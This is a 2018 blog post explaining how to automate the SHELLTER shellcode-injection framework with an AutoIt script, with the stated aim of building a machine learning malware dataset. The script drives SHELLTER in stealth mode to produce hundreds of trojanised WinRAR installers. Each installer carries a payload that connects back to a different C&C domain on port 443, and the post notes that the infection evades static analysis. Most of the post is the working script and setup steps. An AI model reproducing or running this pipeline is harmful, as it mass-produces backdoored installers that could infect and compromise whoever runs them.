Wednesday, July 4, 2018

Automating generation of SHELLTER payloads

This post serves as a journal of the technique used for automating generation of SHELLTER payloads. 

Objective: Generation of 1000 SHELLTER payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: SHELLTER is a closed-source shellcode injection framework that performs dynamic PE infection based on the execution flow of the target application. Because this approach does not modify the original PE header, the infected binary still appears normal under static analysis.

SHELLTER is a Windows PE binary and can be found at https://www.shellterproject.com/download/

It can be executed on Linux using WINE or directly in Windows. 

Challenge: I initially ran SHELLTER from Linux but had difficulty automating a WINE terminal. After researching the use of Python's subprocess module, I found it too much of a hassle to attempt redirection to and from a WINE terminal from a Linux terminal.

Thus I ended up automating SHELLTER from native Windows instead. AutoIt is free software designed for the creation of automated scripts.


Overview of Technique:
1) Create a Win7 VM on VMware
2) Download SHELLTER
3) Download and install AutoIt
4) Open the AutoIt SciTE script editor
5) Type in the following script


#RequireAdmin
#include <FileConstants.au3>
#include <MsgBoxConstants.au3>
#include <WinAPIFiles.au3>
#include <File.au3>

;If IsAdmin() Then MsgBox($MB_SYSTEMMODAL, "", "The script is running with admin rights.")

; Drive one interactive SHELLTER session: infect .\wrar560.exe with the
; selected payload, using $vVar1 as the C&C domain name.
; The Sleep() values give SHELLTER time to finish each step before the next keys are sent.
Func Generate($vVar1 = "google.com")
    Run('.\shellter.exe')
    Sleep(1000)
    WinWaitActive("Shell7er", "", 1)

    ;automate
    Send("A{Enter}")
    Sleep(1000)

    ;Do not check update
    Send("N{Enter}")
    Sleep(1000)

    ;original binary path
    Send(".\wrar560.exe{Enter}")
    Sleep(35000)

    ;Stealth mode
    Send("Y{Enter}")
    Sleep(1000)

    ;payload selection
    Send("l{Enter}")
    Sleep(2000)
    Send("3{Enter}")
    Sleep(1000)

    ;domain name
    Send($vVar1)
    Send("{Enter}")
    Sleep(1000)

    ;port number
    Send("443{Enter}")
    Sleep(10000)

    Send("{Enter}")
EndFunc

; Debug helper: show a value in a message box
Func print($test3)
    MsgBox($MB_SYSTEMMODAL, "", $test3)
EndFunc

$file = ".\website.csv"
$hFile = FileOpen($file, $FO_READ)

;2 is first entry, 1 is the header
$StartFrom = 2

For $i = $StartFrom To _FileCountLines($file)
    ;column 1 = C&C domain name, column 2 = output binary name
    $line = StringSplit(FileReadLine($hFile, $i), ",")
    $domainName = $line[1]
    Generate($domainName)
    ;print($line[2])
    Sleep(3000)
    $sDestination = ".\malware\" & $line[2]
    ;MsgBox($MB_SYSTEMMODAL, "", $sDestination)
    ;move the infected binary into the dataset folder under its unique name,
    ;then restore the clean original from SHELLTER's backup for the next run
    FileMove(".\wrar560.exe", $sDestination, $FC_OVERWRITE)
    FileMove(".\Shellter_Backups\wrar560.exe", ".\wrar560.exe", $FC_OVERWRITE)
Next

FileClose($hFile)

6) Save the AutoIt script in the same directory where Shellter.exe resides.
7) Create a CSV file using Excel with the following format and save it as website.csv (the script treats row 1 as a header, column 1 as the C&C domain name and column 2 as the output binary name):

8) I have chosen to pack WinRAR (wrar560.exe) with the payload, you may find it here https://www.rarlab.com/rar/wrar560.exe
9) Save wrar560.exe to the same directory as Shellter.exe
10) Execute the AutoIt script


Results: 
Took about 2 days to create over 900 malware samples. 100 more to go =)

Feel free to modify the script accordingly.
